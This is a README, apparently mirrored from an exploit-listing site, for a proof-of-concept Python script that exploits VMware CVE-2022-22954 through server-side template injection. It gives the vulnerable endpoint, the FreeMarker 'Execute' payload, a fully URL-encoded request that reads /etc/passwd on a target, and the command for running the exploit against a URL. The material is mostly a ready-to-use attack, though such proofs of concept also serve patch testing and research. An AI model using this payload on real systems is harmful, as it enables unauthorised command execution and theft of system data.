## https://sploitus.com/exploit?id=979EA51E-E85A-5272-9311-AE6B0A2F756D
# VMware-CVE-2022-22954-Command-Injector
Proof of Concept for exploiting VMware CVE-2022-22954
## How it works
This simple Python script makes a GET request to the specified URL appended with `/catalog-portal/ui/oauth/verify?error=&deviceUdid=` and then followed by a URL encoded version of this string:
```js
${"freemarker.template.utility.Execute"?new()("command")}
```
For example, an output for "cat /etc/passwd" would look like the following:
`{host}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d`
## Instructions
```bash
python3 exploit.py <URL>
```
## References
- https://github.com/sherlocksecurity/VMware-CVE-2022-22954